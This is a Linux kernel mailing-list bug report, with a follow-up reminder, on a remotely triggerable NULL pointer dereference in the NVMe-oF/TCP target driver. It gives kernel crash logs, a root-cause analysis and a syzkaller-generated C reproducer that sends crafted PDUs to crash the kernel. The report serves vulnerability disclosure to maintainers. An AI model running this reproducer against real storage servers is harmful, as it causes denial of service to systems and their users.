[Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_build_iovec`

Alon Zahavi zahavi.alon at gmail.com
Wed Nov 15 01:35:40 PST 2023


Just sending another reminder for this issue.
Until a fix for this there is a remote DoS that can be triggered.

On Mon, 6 Nov 2023 at 15:40, Alon Zahavi <zahavi.alon at gmail.com> wrote:
>
> # Bug Overview
>
> ## The Bug
> A null-ptr-deref in `nvmet_tcp_build_iovec`.
>
> ## Bug Location
> `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_build_iovec`.
>
> ## Bug Class
> Remote Denial of Service
>
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.
>
> # Technical Details
>
> ## Kernel Report - NULL Pointer Dereference
> ```
> [  157.833470] BUG: kernel NULL pointer dereference, address:
> 000000000000000c
> [  157.833478] #PF: supervisor read access in kernel mode
> [  157.833484] #PF: error_code(0x0000) - not-present page
> [  157.833490] PGD 126e40067 P4D 126e40067 PUD 130d16067 PMD 0
> [  157.833506] Oops: 0000 [#1] PREEMPT SMP NOPTI
> [  157.833515] CPU: 3 PID: 3067 Comm: kworker/3:3H Kdump: loaded Not
> tainted 6.5.0-rc1+ #5
> [  157.833525] Hardware name: VMware, Inc. VMware Virtual
> Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
> [  157.833532] Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> [  157.833546] RIP: 0010:nvmet_tcp_build_pdu_iovec+0x7a/0x120
> [  157.833558] Code: fe 44 89 a3 20 02 00 00 49 c1 e4 05 4c 03 63 30
> 4c 89 75 d0 41 89 c6 e8 34 b8 18 ff 45 85 ff 0f 84 99 00 00 00 e8 06
> bd 18 ff <41> 8b 74 24 0c 41 8b 44 24 08 4c 89 e7 49 8b 0c 24 89 f2 41
> 89 75
> [  157.833568] RSP: 0018:ffffc9001ab83c28 EFLAGS: 00010293
> [  157.833576] RAX: 0000000000000000 RBX: ffff88812b9583e0 RCX: 0000000000000000
> [  157.833584] RDX: ffff888131b10000 RSI: ffffffff82191dda RDI: ffffffff82191dcc
> [  157.833591] RBP: ffffc9001ab83c58 R08: 0000000000000005 R09: 0000000000000000
> [  157.833598] R10: 0000000000000007 R11: 0000000000000000 R12: 0000000000000000
> [  157.833605] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000007
> [  157.833612] FS:  0000000000000000(0000) GS:ffff888233f80000(0000)
> knlGS:0000000000000000
> [  157.833630] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [  157.833638] CR2: 000000000000000c CR3: 0000000122dd4002 CR4: 00000000007706e0
> [  157.833659] PKRU: 55555554
> [  157.833686] Call Trace:
> [  157.833691]  <TASK>
> [  157.833712]  ? show_regs+0x6e/0x80
> [  157.833745]  ? __die+0x29/0x70
> [  157.833757]  ? page_fault_oops+0x278/0x740
> [  157.833784]  ? up+0x3b/0x70
> [  157.833835]  ? do_user_addr_fault+0x63b/0x1040
> [  157.833846]  ? __sanitizer_cov_trace_const_cmp4+0x1a/0x20
> [  157.833862]  ? irq_work_queue+0x95/0xc0
> [  157.833874]  ? exc_page_fault+0xcf/0x390
> [  157.833889]  ? asm_exc_page_fault+0x2b/0x30
> [  157.833925]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
> [  157.833958]  ? nvmet_tcp_build_pdu_iovec+0x6c/0x120
> [  157.833971]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
> [  157.833998]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
> [  157.834011]  nvmet_tcp_try_recv_pdu+0x995/0x1310
> [  157.834066]  nvmet_tcp_io_work+0xe6/0xd90
> [  157.834081]  process_one_work+0x3da/0x870
> [  157.834112]  worker_thread+0x67/0x640
> [  157.834124]  kthread+0x164/0x1b0
> [  157.834138]  ? __pfx_worker_thread+0x10/0x10
> [  157.834148]  ? __pfx_kthread+0x10/0x10
> [  157.834162]  ret_from_fork+0x29/0x50
> [  157.834180]  </TASK>
> ```
>
> ## Description
>
> ### Tracing The Bug
> As written above, the bug occurs during the execution of
> nvmet_tcp_build_iovec. Looking at the kernel logs report we can see
> the exact line of code that triggers the bug.
>
> Code Block 1:
> ```
> static void nvmet_tcp_build_pdu_iovec(struct nvmet_tcp_cmd *cmd)
> {
>   ...
>   sg = &cmd->req.sg[cmd->sg_idx]; // #1
>
>   while (length) {
>     u32 iov_len = min_t(u32, length, sg->length - sg_offset); // #2
>   ...
>   }
> ...
> }
> ```
> Breakdown:
>
> 1. The variable `sg` is getting the value of  `&cmd->req.sg[cmd->sg_idx]`.
> At the assembly level (intel flavor):
> ```
> mov    DWORD PTR [rbx+0x220], r12d     ; r12 holds the `cmd` address
> add    r12, QWORD PTR [rbx+0x30]          ; adding the value of
> `req.sg[cmd->sg_idx]`
> ```
>
> However, `cmd->req.sg` is NULL at this point of execution thus `sg`
> will point to `0 + cmd->sg_idx`, which will most likely be either 0x0
> or 0x1, a non-accessible memory addresses.
>
> 2. After moving the address into `sg` the driver will dereference it
> later, inside the while loop.
> ```
> mov    esi, DWORD PTR [r12+0xc]
> ```
> When getting here, `r12` will point into (probably) 0x0. This means
> that the CPU will try to access the memory address 0xC and will
> trigger a NULL pointer dereference.
>
>
> ## Root Cause
> `req` is initialized during `nvmet_req_init`. However, the sequence
> that leads into `nvmet_tcp_build_iovec` does not contain any call for
> `nvmet_req_init`, thus crashing the kernel with NULL pointer
> dereference. This flow of execution can also create a situation where
> an uninitialized memory address will be dereferenced, which has
> undefined behaviour.
>
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.
>
> ```
> // autogenerated by syzkaller (https://github.com/google/syzkaller)
>
> #define _GNU_SOURCE
>
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <sched.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mount.h>
> #include <sys/prctl.h>
> #include <sys/resource.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/time.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <unistd.h>
>
> #include <linux/capability.h>
>
> uint64_t r[1] = {0xffffffffffffffff};
>
> void loop(void)
> {
>   intptr_t res = 0;
>   res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
>   if (res != -1)
>     r[0] = res;
>   *(uint16_t*)0x20000100 = 2;
>   *(uint16_t*)0x20000102 = htobe16(0x1144);
>   *(uint32_t*)0x20000104 = htobe32(0x7f000001);
>   syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
>   *(uint8_t*)0x200001c0 = 0;
>   *(uint8_t*)0x200001c1 = 0;
>   *(uint8_t*)0x200001c2 = 0x80;
>   *(uint8_t*)0x200001c3 = 0;
>   *(uint32_t*)0x200001c4 = 0x80;
>   *(uint16_t*)0x200001c8 = 0;
>   *(uint8_t*)0x200001ca = 0;
>   *(uint8_t*)0x200001cb = 0;
>   *(uint32_t*)0x200001cc = 0;
>   memcpy((void*)0x200001d0,
>          "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>          "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>          "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
>          "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>          "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>          "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>          "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
>          112);
>   syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
>           /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>   *(uint8_t*)0x20000080 = 6;
>   *(uint8_t*)0x20000081 = 3;
>   *(uint8_t*)0x20000082 = 0x18;
>   *(uint8_t*)0x20000083 = 0x1c;
>   *(uint32_t*)0x20000084 = 2;
>   *(uint16_t*)0x20000088 = 0x5d;
>   *(uint16_t*)0x2000008a = 3;
>   *(uint32_t*)0x2000008c = 0;
>   *(uint32_t*)0x20000090 = 7;
>   memcpy((void*)0x20000094, "\x83\x9e\x4f\x1a", 4);
>   syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
>           /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> }
> int main(void)
> {
>   syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   loop();
>   return 0;
> }
> ```
>
> ### More information
> When trying to reproduce the bug, this bug sometimes changes from a
> null-ptr-deref into OOM (out of memory) panic.
> This implies that there might be another memory corruption that also
> happens before the dereferencing of NULL. I couldn't find the root
> cause for the OOM bug. However, I am attaching the kernel log for that
> bug below.
> ```
> [    2.075100] Out of memory and no killable processes...
> [    2.075107] Kernel panic - not syncing: System is deadlocked on memory
> [    2.075303] CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
> [    2.075428] Hardware name: VMware, Inc. VMware Virtual
> Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
> [    2.075608] Workqueue: eval_map_wq tracer_init_tracefs_work_func
> [    2.075733] Call Trace:
> [    2.075786]  <TASK>
> [    2.075836]  dump_stack_lvl+0xaa/0x110
> [    2.075921]  dump_stack+0x19/0x20
> [    2.075997]  panic+0x567/0x5b0
> [    2.076075]  ? out_of_memory+0xb01/0xb10
> [    2.076167]  out_of_memory+0xb0d/0xb10
> [    2.076272]  __alloc_pages+0xe87/0x1220
> [    2.076358]  ? mark_held_locks+0x4d/0x80
> [    2.076467]  alloc_pages+0xd7/0x200
> [    2.076552]  allocate_slab+0x37e/0x500
> [    2.076636]  ? mark_held_locks+0x4d/0x80
> [    2.076726]  ? __sanitizer_cov_trace_const_cmp4+0x1a/0x20
> [    2.076806]  ___slab_alloc+0x9c6/0x1250
> [    2.076806]  ? __d_alloc+0x3d/0x2f0
> [    2.076806]  kmem_cache_alloc_lru+0x45e/0x5d0
> [    2.076806]  ? kmem_cache_alloc_lru+0x45e/0x5d0
> [    2.076806]  ? __d_alloc+0x3d/0x2f0
> [    2.076806]  __d_alloc+0x3d/0x2f0
> [    2.076806]  ? __d_alloc+0x3d/0x2f0
> [    2.076806]  d_alloc_parallel+0x75/0x1040
> [    2.076806]  ? lockdep_init_map_type+0x50/0x240
> [    2.076806]  __lookup_slow+0xf4/0x2a0
> [    2.076806]  lookup_one_len+0xde/0x100
> [    2.076806]  start_creating+0xaf/0x180
> [    2.076806]  tracefs_create_file+0xa2/0x260
> [    2.076806]  trace_create_file+0x38/0x70
> [    2.076806]  event_create_dir+0x4c0/0x6e0
> [    2.076806]  __trace_early_add_event_dirs+0x57/0x100
> [    2.076806]  event_trace_init+0xe4/0x160
> [    2.076806]  tracer_init_tracefs_work_func+0x15/0x440
> [    2.076806]  process_one_work+0x3da/0x870
> [    2.076806]  worker_thread+0x67/0x640
> [    2.076806]  kthread+0x164/0x1b0
> [    2.076806]  ? __pfx_worker_thread+0x10/0x10
> [    2.076806]  ? __pfx_kthread+0x10/0x10
> [    2.076806]  ret_from_fork+0x29/0x50
> [    2.076806]  </TASK>
> [    2.076806] ---[ end Kernel panic - not syncing: System is
> deadlocked on memory ]---
> ```
> In case you found out what caused the OOM, please let me know.
>
> ## About this report
> This report is almost identical to another report I sent to you, with
> the title "[Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in
> __nvmet_req_complete". The root cause seems to be the same, and both
> bugs sometimes cause OOM kernel panic. If you think those bugs should
> be addressed as one, please let me know.



More information about the Linux-nvme mailing list